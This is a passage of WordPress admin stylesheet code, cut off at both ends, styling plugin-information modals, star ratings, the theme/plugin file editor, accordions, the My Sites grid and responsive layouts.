deprecate for global style ------------------------------------------------------------------------------*/ .media-icon { width: 62px; /* icon + border */ text-align: center; } .media-icon img { border: 1px solid #dcdcde; border: 1px solid rgba(0, 0, 0, 0.07); } #howto { font-size: 11px; margin: 0 5px; display: block; } .importers { font-size: 16px; width: auto; } .importers td { padding-right: 14px; line-height: 1.4; } .importers .import-system { max-width: 250px; } .importers td.desc { max-width: 500px; } .importer-title, .importer-desc, .importer-action { display: block; } .importer-title { color: #000; font-size: 14px; font-weight: 400; margin-bottom: .2em; } .importer-action { line-height: 1.55; /* Same as with .updating-message */ color: #50575e; margin-bottom: 1em; } #post-body #post-body-content #namediv h3, /* Back-compat for pre-4.4 */ #post-body #post-body-content #namediv h2 { margin-top: 0; } .edit-comment-author { color: #1d2327; border-bottom: 1px solid #f0f0f1; } #namediv h3 label, /* Back-compat for pre-4.4 */ #namediv h2 label { vertical-align: baseline; } #namediv table { width: 100%; } #namediv td.first { width: 10px; white-space: nowrap; } #namediv input { width: 100%; } #namediv p { margin: 10px 0; } /* - Used - but could/should be deprecated with a CSS reset ------------------------------------------------------------------------------*/ .zerosize { height: 0; width: 0; margin: 0; border: 0; padding: 0; overflow: hidden; position: absolute; } br.clear { height: 2px; line-height: 0.15; } .checkbox { border: none; margin: 0; padding: 0; } fieldset { border: 0; padding: 0; margin: 0; } .post-categories { display: inline; margin: 0; padding: 0; } .post-categories li { display: inline; } /* Star Ratings - Back-compat for pre-3.8 */ div.star-holder { position: relative; height: 17px; width: 100px; background: url(../images/stars.png?ver=20121108) repeat-x bottom left; } div.star-holder .star-rating { background: url(../images/stars.png?ver=20121108) repeat-x top left; height: 17px; float: left; } /* Star Ratings */ .star-rating { white-space: nowrap; } .star-rating .star { display: inline-block; width: 20px; height: 20px; -webkit-font-smoothing: antialiased; font-size: 20px; line-height: 1; font-family: dashicons; text-decoration: inherit; font-weight: 400; font-style: normal; vertical-align: top; transition: color .1s ease-in; text-align: center; color: #dba617; } .star-rating .star-full:before { content: "\f155"; content: "\f155" / ''; } .star-rating .star-half:before { content: "\f459"; content: "\f459" / ''; } .rtl .star-rating .star-half { transform: rotateY(180deg); } .star-rating .star-empty:before { content: "\f154"; content: "\f154" / ''; } div.action-links { font-weight: 400; margin: 6px 0 0; } /* Plugin install thickbox */ #plugin-information { background: #fff; position: fixed; top: 0; right: 0; bottom: 0; left: 0; height: 100%; padding: 0; } #plugin-information-scrollable { overflow: auto; -webkit-overflow-scrolling: touch; height: 100%; } #plugin-information-title { padding: 0 26px; background: #f6f7f7; font-size: 22px; font-weight: 600; line-height: 2.4; position: relative; height: 56px; } #plugin-information-title.with-banner { margin-right: 0; height: 250px; background-size: cover; } #plugin-information-title h2 { font-size: 1em; font-weight: 600; padding: 0; margin: 0; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; } #plugin-information-title.with-banner h2 { position: relative; font-family: "Helvetica Neue", sans-serif; display: inline-block; font-size: 30px; line-height: 1.68; box-sizing: border-box; max-width: 100%; padding: 0 15px; margin-top: 174px; color: #fff; background: rgba(29, 35, 39, 0.9); text-shadow: 0 1px 3px rgba(0, 0, 0, 0.4); box-shadow: 0 0 30px rgba(255, 255, 255, 0.1); border-radius: 8px; } #plugin-information-title div.vignette { display: none; } #plugin-information-title.with-banner div.vignette { position: absolute; display: block; top: 0; left: 0; height: 250px; width: 100%; background: transparent; box-shadow: inset 0 0 50px 4px rgba(0, 0, 0, 0.2), inset 0 -1px 0 rgba(0, 0, 0, 0.1); } #plugin-information-tabs { padding: 0 16px; position: relative; right: 0; left: 0; min-height: 36px; font-size: 0; z-index: 1; border-bottom: 1px solid #dcdcde; background: #f6f7f7; } #plugin-information-tabs a { position: relative; display: inline-block; padding: 9px 10px; margin: 0; height: 18px; line-height: 1.3; font-size: 14px; text-decoration: none; transition: none; } #plugin-information-tabs a.current { margin: 0 -1px -1px; background: #fff; border: 1px solid #dcdcde; border-bottom-color: #fff; padding-top: 8px; color: #2c3338; } #plugin-information-tabs.with-banner a.current { border-top: none; padding-top: 9px; } #plugin-information-tabs a:active, #plugin-information-tabs a:focus { outline: none; } #plugin-information-content { overflow: hidden; /* equal height column trick */ background: #fff; position: relative; top: 0; right: 0; left: 0; min-height: 100%; /* Height of title + tabs + install now */ min-height: calc( 100% - 152px ); } #plugin-information-content.with-banner { /* Height of banner + tabs + install now */ min-height: calc( 100% - 346px ); } #section-holder { position: relative; top: 0; right: 250px; bottom: 0; left: 0; margin-top: 10px; margin-right: 250px; /* FYI box */ padding: 10px 26px 99999px; /* equal height column trick */ margin-bottom: -99932px; /* 67px less than the padding below to accommodate footer height */ } #section-holder .notice { margin: 5px 0 15px; } #section-holder .updated { margin: 16px 0; } #plugin-information .fyi { float: right; position: relative; top: 0; right: 0; padding: 16px 16px 99999px; /* equal height column trick */ margin-bottom: -99932px; /* 67px less than the padding below to accommodate footer height */ width: 217px; border-left: 1px solid #dcdcde; background: #f6f7f7; color: #646970; } #plugin-information .fyi strong { color: #3c434a; } #plugin-information .fyi h3 { font-weight: 600; text-transform: uppercase; font-size: 12px; color: #646970; margin: 24px 0 8px; } #plugin-information .fyi h2 { font-size: 0.9em; margin-bottom: 0; margin-right: 0; } #plugin-information .fyi ul { padding: 0; margin: 0; list-style: none; } #plugin-information .fyi li { margin: 0 0 10px; } #plugin-information .fyi-description { margin-top: 0; } #plugin-information .counter-container { margin: 3px 0; } #plugin-information .counter-label { float: left; margin-right: 5px; min-width: 55px; } #plugin-information .counter-back { height: 17px; width: 92px; background-color: #dcdcde; float: left; } #plugin-information .counter-bar { height: 17px; background-color: #f0c33c; /* slightly lighter than stars due to larger expanse */ float: left; } #plugin-information .counter-count { margin-left: 5px; } #plugin-information .fyi ul.contributors { margin-top: 10px; } #plugin-information .fyi ul.contributors li { display: inline-block; margin-right: 8px; vertical-align: middle; } #plugin-information .fyi ul.contributors li { display: inline-block; margin-right: 8px; vertical-align: middle; } #plugin-information .fyi ul.contributors li img { vertical-align: middle; margin-right: 4px; } #plugin-information-footer { padding: 13px 16px; position: absolute; right: 0; bottom: 0; left: 0; height: 40px; /* actual height: 40+13+13+1=67 */ border-top: 1px solid #dcdcde; background: #f6f7f7; } /* rtl:ignore */ #plugin-information .section { direction: ltr; } /* rtl:ignore */ #plugin-information .section ul, #plugin-information .section ol { list-style-type: disc; margin-left: 24px; } #plugin-information .section, #plugin-information .section p { font-size: 14px; line-height: 1.7; } #plugin-information #section-screenshots ol { list-style: none; margin: 0; } #plugin-information #section-screenshots li img { vertical-align: text-top; margin-top: 16px; max-width: 100%; width: auto; height: auto; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.3); } /* rtl:ignore */ #plugin-information #section-screenshots li p { font-style: italic; padding-left: 20px; } #plugin-information pre { padding: 7px; overflow: auto; border: 1px solid #c3c4c7; } #plugin-information blockquote { border-left: 2px solid #dcdcde; color: #646970; font-style: italic; margin: 1em 0; padding: 0 0 0 1em; } /* rtl:ignore */ #plugin-information .review { overflow: hidden; /* clearfix */ width: 100%; margin-bottom: 20px; border-bottom: 1px solid #dcdcde; } #plugin-information .review-title-section { overflow: hidden; /* clearfix */ } /* rtl:ignore */ #plugin-information .review-title-section h4 { display: inline-block; float: left; margin: 0 6px 0 0; } #plugin-information .reviewer-info p { clear: both; margin: 0; padding-top: 2px; } /* rtl:ignore */ #plugin-information .reviewer-info .avatar { float: left; margin: 4px 6px 0 0; } /* rtl:ignore */ #plugin-information .reviewer-info .star-rating { float: left; } /* rtl:ignore */ #plugin-information .review-meta { float: left; margin-left: 0.75em; } /* rtl:ignore */ #plugin-information .review-body { float: left; width: 100%; } .plugin-version-author-uri { font-size: 13px; } /* For non-js plugin installation screen ticket #36430. */ .update-php .button.button-primary { margin-right: 1em; } @media screen and (max-width: 771px) { #plugin-information-title.with-banner { height: 100px; } #plugin-information-title.with-banner h2 { margin-top: 30px; font-size: 20px; line-height: 2; max-width: 85%; } #plugin-information-title.with-banner div.vignette { height: 100px; } #plugin-information-tabs { overflow: hidden; /* clearfix */ padding: 0; height: auto; /* let tabs wrap */ } #plugin-information-tabs a.current { margin-bottom: 0; border-bottom: none; } #plugin-information .fyi { float: none; border: 1px solid #dcdcde; position: static; width: auto; margin: 26px 26px 0; padding-bottom: 0; /* reset from the two column height fix */ } #section-holder { position: static; margin: 0; padding-bottom: 70px; /* reset from the two column height fix, plus accommodate footer */ } #plugin-information .fyi h3, #plugin-information .fyi small { display: none; } #plugin-information-footer { padding: 12px 16px 0; height: 46px; } } /* Thickbox for the Plugin details modal. */ #TB_window.plugin-details-modal { background: #fff; } #TB_window.plugin-details-modal.thickbox-loading:before { content: ""; display: block; width: 20px; height: 20px; position: absolute; left: 50%; top: 50%; z-index: -1; margin: -10px 0 0 -10px; background: #fff url(../images/spinner.gif) no-repeat center; background-size: 20px 20px; transform: translateZ(0); } @media print, (min-resolution: 120dpi) { #TB_window.plugin-details-modal.thickbox-loading:before { background-image: url(../images/spinner-2x.gif); } } .plugin-details-modal #TB_title { float: left; height: 1px; } .plugin-details-modal #TB_ajaxWindowTitle { display: none; } .plugin-details-modal #TB_closeWindowButton { left: auto; right: -30px; color: #f0f0f1; } .plugin-details-modal #TB_closeWindowButton:hover, .plugin-details-modal #TB_closeWindowButton:focus { outline: none; box-shadow: none; } .plugin-details-modal #TB_closeWindowButton:hover::after, .plugin-details-modal #TB_closeWindowButton:focus::after { outline: 2px solid; outline-offset: -4px; border-radius: 4px; } .plugin-details-modal .tb-close-icon { display: none; } .plugin-details-modal #TB_closeWindowButton:after { content: "\f335"; content: "\f335" / ''; font: normal 32px/29px 'dashicons'; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* move plugin install close icon to top on narrow screens */ @media screen and (max-width: 830px) { .plugin-details-modal #TB_closeWindowButton { right: 0; top: -30px; } } /* @todo: move this. */ img { border: none; } /* Metabox collapse arrow indicators */ .sidebar-name .toggle-indicator::before, .meta-box-sortables .postbox .toggle-indicator::before, .meta-box-sortables .postbox .order-higher-indicator::before, .meta-box-sortables .postbox .order-lower-indicator::before, .bulk-action-notice .toggle-indicator::before, .privacy-text-box .toggle-indicator::before { content: "\f142"; content: "\f142" / ''; display: inline-block; font: normal 20px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none; } .js .widgets-holder-wrap.closed .toggle-indicator::before, .meta-box-sortables .postbox.closed .handlediv .toggle-indicator::before, .bulk-action-notice .bulk-action-errors-collapsed .toggle-indicator::before, .privacy-text-box.closed .toggle-indicator::before { content: "\f140"; content: "\f140" / ''; } .postbox .handle-order-higher .order-higher-indicator::before { content: "\f343"; content: "\f343" / ''; color: inherit; } .postbox .handle-order-lower .order-lower-indicator::before { content: "\f347"; content: "\f347" / ''; color: inherit; } .postbox .handle-order-higher .order-higher-indicator::before, .postbox .handle-order-lower .order-lower-indicator::before { position: relative; top: 0.11rem; width: 20px; height: 20px; } .postbox .handlediv .toggle-indicator::before { width: 20px; border-radius: 50%; } .postbox .handlediv .toggle-indicator::before { position: relative; top: 0.05rem; text-indent: -1px; /* account for the dashicon glyph uneven horizontal alignment */ } .rtl .postbox .handlediv .toggle-indicator::before { text-indent: 1px; /* account for the dashicon glyph uneven horizontal alignment */ } .bulk-action-notice .toggle-indicator::before { line-height: 16px; vertical-align: top; color: #787c82; } .postbox .handle-order-higher:focus, .postbox .handle-order-lower:focus, .postbox .handlediv:focus { box-shadow: inset 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); border-radius: 50%; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .postbox .handle-order-higher:focus .order-higher-indicator::before, .postbox .handle-order-lower:focus .order-lower-indicator::before, .postbox .handlediv:focus .toggle-indicator::before { box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } /* @todo: appears to be Press This only and overridden */ #photo-add-url-div input[type="text"] { width: 300px; } /* Theme/Plugin file editor */ .alignleft h2 { margin: 0; } #template textarea { font-family: Consolas, Monaco, monospace; font-size: 13px; background: #f6f7f7; tab-size: 4; } #template textarea, #template .CodeMirror { width: 100%; min-height: 60vh; height: calc( 100vh - 295px ); border: 1px solid #dcdcde; box-sizing: border-box; } #templateside > h2 { padding-top: 6px; padding-bottom: 7px; margin: 0; } #templateside ol, #templateside ul { margin: 0; padding: 0; } #templateside > ul { box-sizing: border-box; margin-top: 0; overflow: auto; padding: 0; min-height: 60vh; height: calc(100vh - 295px); background-color: #f6f7f7; border: 1px solid #dcdcde; border-left: none; } #templateside ul ul { padding-left: 12px; } #templateside > ul > li > ul[role=group] { padding-left: 0; } /* * Styles for Theme and Plugin file editors. */ /* Hide collapsed items. */ [role="treeitem"][aria-expanded="false"] > ul { display: none; } /* Use arrow dashicons for folder states, but hide from screen readers. */ [role="treeitem"] span[aria-hidden] { display: inline; font-family: dashicons; font-size: 20px; position: absolute; pointer-events: none; } [role="treeitem"][aria-expanded="false"] > .folder-label .icon:after { content: "\f139"; content: "\f139" / ''; } [role="treeitem"][aria-expanded="true"] > .folder-label .icon:after { content: "\f140"; content: "\f140" / ''; } [role="treeitem"] .folder-label { display: block; padding: 3px 3px 3px 12px; cursor: pointer; } /* Remove outline, and create our own focus and hover styles */ [role="treeitem"] { outline: 0; } [role="treeitem"] a:focus, [role="treeitem"] .folder-label.focus { color: #043959; /* Reset default focus style. */ box-shadow: none; /* Use an inset outline instead, so it's visible also over the current file item. */ outline: 2px solid var(--wp-admin-theme-color, #3858e9); outline-offset: -2px; } [role="treeitem"].hover, [role="treeitem"] .folder-label.hover { background-color: #f0f0f1; } .tree-folder { margin: 0; position: relative; } [role="treeitem"] li { position: relative; } /* Styles for folder indicators/depth */ .tree-folder .tree-folder::after { content: ""; display: block; position: absolute; left: 2px; border-left: 1px solid #c3c4c7; top: -13px; bottom: 10px; } .tree-folder > li::before { content: ""; position: absolute; display: block; border-left: 1px solid #c3c4c7; left: 2px; top: -5px; height: 18px; width: 7px; border-bottom: 1px solid #c3c4c7; } .tree-folder > li::after { content: ""; position: absolute; display: block; border-left: 1px solid #c3c4c7; left: 2px; bottom: -7px; top: 0; } /* current-file needs to adjustment for .notice styles */ #templateside .current-file { margin: -4px 0 -2px; } .tree-folder > .current-file::before { left: 4px; height: 15px; width: 0; border-left: none; top: 3px; } .tree-folder > .current-file::after { bottom: -4px; height: 7px; left: 2px; top: auto; } /* Lines shouldn't continue on last item */ .tree-folder > li:last-child::after, .tree-folder li:last-child > .tree-folder::after { display: none; } #theme-plugin-editor-selector, #theme-plugin-editor-label, #documentation label { font-weight: 600; } #theme-plugin-editor-label { display: inline-block; margin-bottom: 1em; } /* rtl:ignore */ #template textarea, #docs-list { direction: ltr; } .fileedit-sub #theme, .fileedit-sub #plugin { max-width: 40%; } .fileedit-sub .alignright { text-align: right; } #template p { width: 97%; } #file-editor-linting-error { margin-top: 1em; margin-bottom: 1em; } #file-editor-linting-error > .notice { margin: 0; display: inline-block; } #file-editor-linting-error > .notice > p { width: auto; } #template .submit { margin-top: 1em; padding: 0; } #template .submit input[type=submit][disabled] { cursor: not-allowed; } #templateside { float: right; width: 16em; word-wrap: break-word; } #postcustomstuff p.submit { margin: 0; } #templateside h4 { margin: 1em 0 0; } #templateside li { margin: 4px 0; } #templateside li:not(.howto) a, .theme-editor-php .highlight { display: block; padding: 3px 0 3px 12px; text-decoration: none; } #templateside li.current-file > a { padding-bottom: 0; } #templateside li:not(.howto) > a:first-of-type { padding-top: 0; } #templateside li.howto { padding: 6px 12px 12px; } .theme-editor-php .highlight { margin: -3px 3px -3px -12px; } #templateside .highlight { border: none; font-weight: 600; } .nonessential { color: #646970; font-size: 11px; font-style: italic; padding-left: 12px; } #documentation { margin-top: 10px; } #documentation label { line-height: 1.8; vertical-align: baseline; } .fileedit-sub { padding: 10px 0 8px; line-height: 180%; } #file-editor-warning .file-editor-warning-content { margin: 25px; } /* @todo: can we use a common class for these? */ .nav-menus-php .item-edit:before, .wp-customizer .control-section .accordion-section-title:after, .wp-customizer .accordion-section-title:after, .widget-top .widget-action .toggle-indicator:before { content: "\f140"; content: "\f140" / ''; font: normal 20px/1 dashicons; display: block; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none; } .widget-top .widget-action .toggle-indicator:before { padding: 1px 2px 1px 0; border-radius: 50%; } .handlediv, .postbox .handlediv.button-link, .item-edit, .toggle-indicator { color: #646970; } .widget-action { color: #50575e; /* #fafafa background in the Widgets screen */ } .widget-top:hover .widget-action, .widget-action:focus, .handlediv:hover, .handlediv:focus, .postbox .handlediv.button-link:hover, .postbox .handlediv.button-link:focus, .item-edit:hover, .item-edit:focus, .sidebar-name:hover .toggle-indicator { color: #1d2327; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .widget-top .widget-action:focus .toggle-indicator:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #customize-info.open .accordion-section-title:after, .nav-menus-php .menu-item-edit-active .item-edit:before, .widget.open .widget-top .widget-action .toggle-indicator:before, .widget.widget-in-question .widget-top .widget-action .toggle-indicator:before { content: "\f142"; content: "\f142" / ''; } /*! * jQuery UI Draggable/Sortable 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */ .ui-draggable-handle, .ui-sortable-handle { touch-action: none; } /* Accordion */ .accordion-section { border-bottom: 1px solid #dcdcde; margin: 0; } .accordion-section.open .accordion-section-content, .no-js .accordion-section .accordion-section-content { display: block; } .accordion-section.open:hover { border-bottom-color: #dcdcde; } .accordion-section-content { display: none; padding: 10px 20px 15px; overflow: hidden; background: #fff; } .accordion-section-title { margin: 0; position: relative; border-left: 1px solid #dcdcde; border-right: 1px solid #dcdcde; -webkit-user-select: none; user-select: none; } .js .accordion-section-title { cursor: pointer; } .js .accordion-section-title:after { position: absolute; top: 12px; right: 10px; z-index: 1; } .accordion-section-title:focus { /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } .accordion-section-title:hover:after, .accordion-section-title:focus:after { border-color: #a7aaad transparent; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } .cannot-expand .accordion-section-title { cursor: auto; } .cannot-expand .accordion-section-title:after { display: none; } .control-section .accordion-section-title, .customize-pane-child .accordion-section-title { border-left: none; border-right: none; padding: 10px 10px 11px 14px; line-height: 1.55; background: #fff; } .control-section .accordion-section-title:after, .customize-pane-child .accordion-section-title:after { top: calc(50% - 10px); /* Arrow height is 20px, so use half of that to vertically center */ } .js .control-section:hover .accordion-section-title, .js .control-section .accordion-section-title:hover, .js .control-section.open .accordion-section-title, .js .control-section .accordion-section-title:focus { color: #1d2327; background: #f6f7f7; } .control-section.open .accordion-section-title { /* When expanded */ border-bottom: 1px solid #dcdcde; } /* Edit Site */ .network-admin .edit-site-actions { margin-top: 0; } /* My Sites */ .my-sites { display: block; overflow: auto; zoom: 1; } .my-sites li { display: block; padding: 8px 3%; min-height: 130px; margin: 0; } @media only screen and (max-width: 599px) { .my-sites li { min-height: 0; } } @media only screen and (min-width: 600px) { .my-sites.striped li { background-color: #fff; position: relative; } .my-sites.striped li:after { content: ""; width: 1px; height: 100%; position: absolute; top: 0; right: 0; background: #c3c4c7; } } @media only screen and (min-width: 600px) and (max-width: 699px) { .my-sites li{ float: left; width: 44%; } .my-sites.striped li { background-color: #fff; } .my-sites.striped li:nth-of-type(2n+1) { clear: left; } .my-sites.striped li:nth-of-type(2n+2):after { content: none; } .my-sites li:nth-of-type(4n+1), .my-sites li:nth-of-type(4n+2) { background-color: #f6f7f7; } } @media only screen and (min-width: 700px) and (max-width: 1199px) { .my-sites li { float: left; width: 27.333333%; background-color: #fff; } .my-sites.striped li:nth-of-type(3n+3):after { content: none; } .my-sites li:nth-of-type(6n+1), .my-sites li:nth-of-type(6n+2), .my-sites li:nth-of-type(6n+3) { background-color: #f6f7f7; } } @media only screen and (min-width: 1200px) and (max-width: 1399px) { .my-sites li { float: left; width: 21%; padding: 8px 2%; background-color: #fff; } .my-sites.striped li:nth-of-type(4n+1) { clear: left; } .my-sites.striped li:nth-of-type(4n+4):after { content: none; } .my-sites li:nth-of-type(8n+1), .my-sites li:nth-of-type(8n+2), .my-sites li:nth-of-type(8n+3), .my-sites li:nth-of-type(8n+4) { background-color: #f6f7f7; } } @media only screen and (min-width: 1400px) and (max-width: 1599px) { .my-sites li { float: left; width: 16%; padding: 8px 2%; background-color: #fff; } .my-sites.striped li:nth-of-type(5n+1) { clear: left; } .my-sites.striped li:nth-of-type(5n+5):after { content: none; } .my-sites li:nth-of-type(10n+1), .my-sites li:nth-of-type(10n+2), .my-sites li:nth-of-type(10n+3), .my-sites li:nth-of-type(10n+4), .my-sites li:nth-of-type(10n+5) { background-color: #f6f7f7; } } @media only screen and (min-width: 1600px) { .my-sites li { float: left; width: 12.666666%; padding: 8px 2%; background-color: #fff; } .my-sites.striped li:nth-of-type(6n+1) { clear: left; } .my-sites.striped li:nth-of-type(6n+6):after { content: none; } .my-sites li:nth-of-type(12n+1), .my-sites li:nth-of-type(12n+2), .my-sites li:nth-of-type(12n+3), .my-sites li:nth-of-type(12n+4), .my-sites li:nth-of-type(12n+5), .my-sites li:nth-of-type(12n+6) { background-color: #f6f7f7; } } .my-sites li a { text-decoration: none; } /* =Media Queries -------------------------------------------------------------- */ /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { /* Back-compat for pre-3.8 */ div.star-holder, div.star-holder .star-rating { background: url(../images/stars-2x.png?ver=20121108) repeat-x bottom left; background-size: 21px 37px; } .spinner { background-image: url(../images/spinner-2x.gif); } } @media screen and (max-width: 782px) { html.wp-toolbar { padding-top: var(--wp-admin--admin-bar--height); } .screen-reader-shortcut:focus { top: -39px; } .block-editor-page .screen-reader-shortcut:focus { top: 7px; } .screen-reader-shortcut[href="#wp-toolbar"] { display: none; } body { min-width: 240px; overflow-x: hidden; } body * { -webkit-tap-highlight-color: rgba(0, 0, 0, 0) !important; } #wpcontent { position: relative; margin-left: 0; padding-left: 10px; } #wpbody-content { padding-bottom: 100px; } .wrap { clear: both; margin-right: 12px; margin-left: 0; } /* categories */ #col-left, #col-right { float: none; width: auto; } #col-left .col-wrap, #col-right .col-wrap { padding: 0; } /* Hidden Elements */ #collapse-menu, .post-format-select { display: none !important; } .wrap h1.wp-heading-inline { margin-bottom: 0.5em; } .wrap .add-new-h2, /* deprecated */ .wrap .add-new-h2:active, /* deprecated */ .wrap .page-title-action, .wrap .page-title-action:active { padding: 0 14px; font-size: 14px; white-space: nowrap; min-height: 40px; line-height: 2.71428571; vertical-align: middle; } /* Feedback Messages */ .notice, .wrap div.updated, .wrap div.error, .media-upload-form div.error { margin: 20px 0 10px; padding: 5px 10px; font-size: 14px; line-height: 175%; } .wp-core-ui .notice.is-dismissible { padding-right: 46px; } .notice-dismiss { padding: 13px; } .wrap .icon32 + h2 { margin-top: -2px; } .wp-responsive-open #wpbody { right: -16em; } code { word-wrap: break-word; word-wrap: anywhere; /* Firefox. Allow breaking long words anywhere */ word-break: break-word; /* Webkit: Treated similarly to word-wrap: break-word */ } /* General Metabox */ .postbox { font-size: 14px; } .metabox-holder h3.hndle, /* Back-compat for pre-4.4 */ .metabox-holder .stuffbox > h3, /* Back-compat for pre-4.4 */ .metabox-holder .postbox > h3, /* Back-compat for pre-4.4 */ .metabox-holder h2 { padding: 12px; } .nav-menus-php .metabox-holder h3 { padding: 0; } .postbox .handlediv { margin-top: 3px; } /* Subsubsub Nav */ .subsubsub { font-size: 16px; text-align: center; margin-bottom: 15px; } /* Theme/Plugin File Editor */ #template textarea, #template .CodeMirror { box-sizing: border-box; } #templateside { float: none; width: auto; } #templateside > ul { border-left: 1px solid #dcdcde; } #templateside li { margin: 0; } #templateside li:not(.howto) a { display: block; padding: 5px; } #templateside li.howto { padding: 12px; } #templateside .highlight { padding: 5px; margin-left: -5px; margin-top: -5px; } #template > div, #template .notice { float: none; margin: 1em 0; width: auto; } #template .CodeMirror, #template textarea { width: 100%; } #templateside ul ul { padding-left: 1.5em; } [role="treeitem"] .folder-label { display: block; padding: 5px; } .tree-folder > li::before, .tree-folder > li::after, .tree-folder .tree-folder::after { left: -8px; } .tree-folder > li::before { top: 0; height: 13px; } .tree-folder > .current-file::before { left: -5px; top: 7px; width: 4px; } .tree-folder > .current-file::after { height: 9px; left: -8px; } .wrap #templateside span.notice { margin-left: -5px; width: 100%; } .fileedit-sub .alignright { float: left; margin-top: 15px; width: 100%; text-align: left; } .fileedit-sub .alignright label { display: block; } .fileedit-sub #theme, .fileedit-sub #plugin { margin-left: 0; max-width: 70%; } .fileedit-sub input[type="submit"] { margin-bottom: 0; } #documentation label[for="docs-list"] { display: block; } #documentation select[name="docs-list"] { margin-left: 0; max-width: 60%; } #documentation input[type="button"] { margin-bottom: 0; } #wpfooter { display: none; } #comments-form .checkforspam { display: none; } .edit-comment-author { margin: 2px 0 0; } .filter-drawer .filter-group-feature input, .filter-drawer .filter-group-feature label { line-height: 2.1; } .filter-drawer .filter-group-feature label { margin-left: 32px; } .wp-filter .button.drawer-toggle { font-size: 13px; line-height: 2; height: 28px; } /* Fix help tab columns for smaller screens */ #screen-meta #contextual-help-wrap { overflow: visible; } #screen-meta #contextual-help-back, #screen-meta .contextual-help-sidebar { display: none; } #screen-meta .contextual-help-tabs { clear: both; width: 100%; float: none; } #screen-meta .contextual-help-tabs ul { margin: 0 0 1em; padding: 1em 0 0; } #screen-meta .contextual-help-tabs .active { margin: 0; } #screen-meta .contextual-help-tabs-wrap { clear: both; max-width: 100%; float: none; } #screen-meta, #screen-meta-links { margin-right: 10px; } #screen-meta-links { margin-bottom: 20px; /* Add margins beneath links for better spacing between boxes and elements */ } #screen-meta-links .show-settings:after { line-height: 1.9; } .wp-filter .search-form input[type="search"] { font-size: 1rem; } .wp-filter .search-form.search-plugins { /* This element is a flex item. */ min-width: 100%; } } /* Smartphone */ @media screen and (max-width: 600px) { /* Disable horizontal scroll when responsive menu is open since we push the main content off to the right. */ #wpwrap.wp-responsive-open { overflow-x: hidden; } html.wp-toolbar { padding-top: 0; } .screen-reader-shortcut:focus { top: 7px; } #wpbody { padding-top: 46px; } /* Keep full-width boxes on Edit Post page from causing horizontal scroll */ div#post-body.metabox-holder.columns-1 { overflow-x: hidden; } h1.nav-tab-wrapper, .wrap h2.nav-tab-wrapper, .nav-tab-wrapper { border-bottom: 0; } h1 .nav-tab, h2 .nav-tab, h3 .nav-tab, nav .nav-tab { margin: 10px 10px 0 0; border-bottom: 1px solid #c3c4c7; } .nav-tab-active:hover, .nav-tab-active:focus, .nav-tab-active:focus:active { border-bottom: 1px solid #c3c4c7; } .wp-filter .search-form.search-plugins label { width: 100%; } } @media screen and (max-width: 480px) { .metabox-prefs-container { display: grid; } .metabox-prefs-container > * { display: inline-block; padding: 2px; } } @media screen and (max-width: 320px) { /* Prevent default center alignment and larger font for the Right Now widget when the network dashboard is viewed on a small mobile device. */ #network_dashboard_right_now .subsubsub { font-size: 14px; text-align: left; } } /*! This file is auto-generated */ .about__container{--background:#ebe8e5;--subtle-background:#ebe8e5;--text:#1e1e1e;--text-light:#fff;--accent-1:#3858e9;--accent-2:#183ad6;--accent-3:#ececec;--accent-gradient:linear-gradient(90deg, #000000 4.7%, var(--accent-1) 83.84%);--nav-background:#fff;--nav-border:transparent;--nav-color:var(--text);--nav-current:var(--accent-1);--border-radius:0.5rem;--gap:2rem}.about-php,.contribute-php,.credits-php,.freedoms-php,.privacy-php{background:#fff}.about-php #wpcontent,.contribute-php #wpcontent,.credits-php #wpcontent,.freedoms-php #wpcontent,.privacy-php #wpcontent{background:#fff;padding:0 24px}@media screen and (max-width:782px){.about-php.auto-fold #wpcontent,.contribute-php.auto-fold #wpcontent,.credits-php.auto-fold #wpcontent,.freedoms-php.auto-fold #wpcontent,.privacy-php.auto-fold #wpcontent{padding-left:24px}}.about__container{max-width:1000px;margin:24px auto;clear:both}.about__container .alignleft{float:left}.about__container .alignright{float:right}.about__container .aligncenter{text-align:center}.about__container .is-vertically-aligned-top{align-self:start}.about__container .is-vertically-aligned-center{align-self:center}.about__container .is-vertically-aligned-bottom{align-self:end}.about__section{background:0 0;clear:both}.about__container .has-accent-background-color{color:var(--text-light);background-color:var(--accent-2)}.about__container .has-transparent-background-color{background-color:transparent}.about__container .has-accent-color{color:var(--accent-2)}.about__container .has-border{border:3px solid currentColor}.about__container .has-subtle-background-color{background-color:var(--subtle-background);border-radius:var(--border-radius)}.about__container .has-background-image{background-size:contain;background-repeat:no-repeat;background-position:center}.about__section{margin:0}.about__section .column:not(.is-edge-to-edge){padding:var(--gap)}.about__section .column.is-left-padding-zero{padding-left:0}.about__section .column.is-right-padding-zero{padding-right:0}.about__section+.about__section .is-section-header{padding-bottom:var(--gap)}.about__section .column.has-border:not(.is-edge-to-edge),.about__section .column[class*=background-color]:not(.is-edge-to-edge),.about__section:where([class*=background-color]) .column:not(.is-edge-to-edge){padding-top:var(--gap);padding-bottom:var(--gap)}.about__section .column p:first-of-type{margin-top:0}.about__section .column p:last-of-type{margin-bottom:0}.about__section .has-text-columns{columns:2;column-gap:calc(var(--gap) * 2)}.about__section .is-section-header{margin-bottom:0;padding:var(--gap) var(--gap) 0}.about__section .is-section-header p:last-child{margin-bottom:0}.about__section .is-section-header:first-child:last-child{padding:0}.about__section.is-feature{padding:var(--gap)}.about__section.is-feature p{margin:0}.about__section.is-feature p+p{margin-top:calc(var(--gap)/ 